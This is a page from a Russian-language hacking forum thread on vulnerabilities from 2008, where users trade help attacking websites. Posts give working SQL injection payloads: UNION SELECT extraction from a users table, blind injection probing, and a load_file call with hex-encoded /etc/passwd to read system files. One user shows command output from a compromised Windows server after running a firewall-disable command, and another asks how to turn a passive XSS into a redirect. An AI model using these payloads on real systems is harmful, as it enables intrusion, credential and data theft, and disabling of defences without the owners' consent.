ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #3691  
Старый 13.11.2008, 19:31
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Что-то блокирует пинги и тд. В процессах я не обнаружил нестандартных firewall'ов. А стандартный вырубил (предполагаю ) командой netsh firewall set opmode disable

Вот перечень процессов:

--------------------------------------------------------------
> tasklist
hex code : 0x7461736b6c697374
--------------------------------------------------------------
Directory listing
--------------------------------------------------------------
smss.exe 276 Console 0 448 K
csrss.exe 324 Console 0 3,884 K
winlogon.exe 348 Console 0 11,668 K
services.exe 396 Console 0 12,264 K
lsass.exe 408 Console 0 8,216 K
svchost.exe 584 Console 0 2,760 K
svchost.exe 648 Console 0 3,340 K
svchost.exe 728 Console 0 4,676 K
svchost.exe 764 Console 0 5,008 K
svchost.exe 780 Console 0 25,320 K
spoolsv.exe 932 Console 0 5,172 K
msdtc.exe 956 Console 0 4,884 K
svchost.exe 1164 Console 0 2,172 K
FPAVServer.exe 1184 Console 0 46,464 K
FreeFTPDService.exe 1216 Console 0 4,444 K
inetinfo.exe 1244 Console 0 13,132 K
sqlservr.exe 1324 Console 0 1,556,928 K
svchost.exe 1820 Console 0 1,316 K
winvnc4.exe 1108 Console 0 3,308 K
mssearch.exe 1428 Console 0 1,116 K
sqlagent.exe 1736 Console 0 4,852 K
svchost.exe 2072 Console 0 4,752 K
distrib.exe 2360 Console 0 6,736 K
logread.exe 2400 Console 0 6,324 K
distrib.exe 2444 Console 0 6,536 K
wmiprvse.exe 2624 Console 0 6,640 K
svchost.exe 2840 Console 0 3,936 K
logon.scr 3684 Console 0 1,660 K
cmd.exe 3648 Console 0 1,496 K
more.com 3704 Console 0 5,392 K
cmd.exe 3252 Console 0 1,492 K
--------------------------------------------------------------

Есть подозрение на FPAVServer.exe, но вроде как это антивирус.
 
Ответить с цитированием

  #3692  
Старый 13.11.2008, 19:39
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

попробуй совет [Raz0r]

http://site.com/script.asp?id=1 or 1=(select HOST_NAME())--

a еще попробуй через cmd ipconfig

Последний раз редактировалось truelamer; 13.11.2008 в 19:45..
 
Ответить с цитированием

  #3693  
Старый 13.11.2008, 19:45
Аватар для SHS
SHS
Познающий
Регистрация: 04.08.2008
Сообщений: 53
Провел на форуме:
63941

Репутация: 2
По умолчанию

Пробовал. Ответ - ALFIE.
Возможно сервер действительно только локальный и доступа ко внешке у него нет. ipconfig я в первую очередь делал Но он мне выдал DNS-суффикс и локальный адрес.
Можно-ли ченить с этого поднять? Или без вариантов?
 
Ответить с цитированием

  #3694  
Старый 14.11.2008, 00:00
Аватар для Tigger
Tigger
Познавший АНТИЧАТ
Регистрация: 27.08.2007
Сообщений: 1,107
Провел на форуме:
5386281

Репутация: 1177


Отправить сообщение для Tigger с помощью ICQ
По умолчанию

Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
 
Ответить с цитированием

  #3695  
Старый 14.11.2008, 00:20
Аватар для Jokester
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от Tigger  
Через SELECT ..... UNHEX(HEX(pole).... FROM ... не получилось
я не понял, а как с этим делать 1+union+select+convert(pole)+using+latin1),+from+t able/* ?
Запрос такого вида +select+1,2,3,4,5,[видимое поле],7,8,9,10+from+users/*
название поля к примеру name
Помогите, пожалуйста))
1+union+select+1,2,3,4,5,UNHEX(HEX(name)),7,8,9,10 +from+users/*
 
Ответить с цитированием

  #3696  
Старый 14.11.2008, 08:35
Аватар для pingvincible
pingvincible
Новичок
Регистрация: 03.11.2008
Сообщений: 5
Провел на форуме:
66983

Репутация: 5
По умолчанию

Цитата:
Parse error: syntax error, unexpected T_ELSE in /home/u19620/xxx/www/edct/themes/10341d4b9666601999076f0da323fd5a/bfa-roundtabs/index.php on line 6
дает ли что-то такая ошибка привыполнении следующего запроса:

Цитата:
http://site.com/?cat=4-1
 
Ответить с цитированием

  #3697  
Старый 14.11.2008, 10:24
Аватар для truelamer
truelamer
Участник форума
Регистрация: 06.11.2007
Сообщений: 143
Провел на форуме:
350782

Репутация: 81
По умолчанию

2pingvincible

Это означает что else испаользуется в коде без if

ни чего ты запросами вида http://site.com/?cat=4-1 не сможешь сделать
 
Ответить с цитированием

  #3698  
Старый 14.11.2008, 10:36
Аватар для R1dex
R1dex
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
Провел на форуме:
1571865

Репутация: 571
Отправить сообщение для R1dex с помощью ICQ
По умолчанию

Кроме раскрытия путей ничего не даёт..
 
Ответить с цитированием

  #3699  
Старый 15.11.2008, 14:45
Аватар для Calcutta
Calcutta
Постоянный
Регистрация: 06.08.2007
Сообщений: 347
Провел на форуме:
2584838

Репутация: 770
Отправить сообщение для Calcutta с помощью ICQ
По умолчанию

Один очень интересный мне сайт имеет багу, инъекция слепая.
кавычки:
1) слешируются
2) подстановка кавычек обрабатывается и выдает пустую страницу.
http://site.ru/index.php?act=18/**/union/**/select/**/concat_ws(0x3a,table_name)/**/from/**/information_schema.tables/**/limit/**/0,1--
всего одна таблица. надо вытащить её название и после колонок в ней.

http://site.ru/index.php?act=25+AND+ascii(lower(substring(user(), 1,1)))=97--
юзера, систем_юзера подобрал. версия мускль 5.

http://site.ru/index.php?act=25+union+select+load_file(0x2F6574632F706173737764)--
особо интересно получить содержимое файла /etc/paswd. или на крайний случай выжать максимально информации.
За помощь + обеспечен -)
 
Ответить с цитированием

  #3700  
Старый 15.11.2008, 14:56
Аватар для S0ulVortex
S0ulVortex
Участник форума
Регистрация: 18.11.2007
Сообщений: 184
Провел на форуме:
1686744

Репутация: 246
Отправить сообщение для S0ulVortex с помощью ICQ
По умолчанию

я в хсс чайник пока полный. Вот есть пассивная хсс вот я щелкаю по ссылке у меня доходит до странички с хсс а можно сделать так чтобы он после поподания на эту страничку переходил на другую например показывал какую нибудь картинку.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ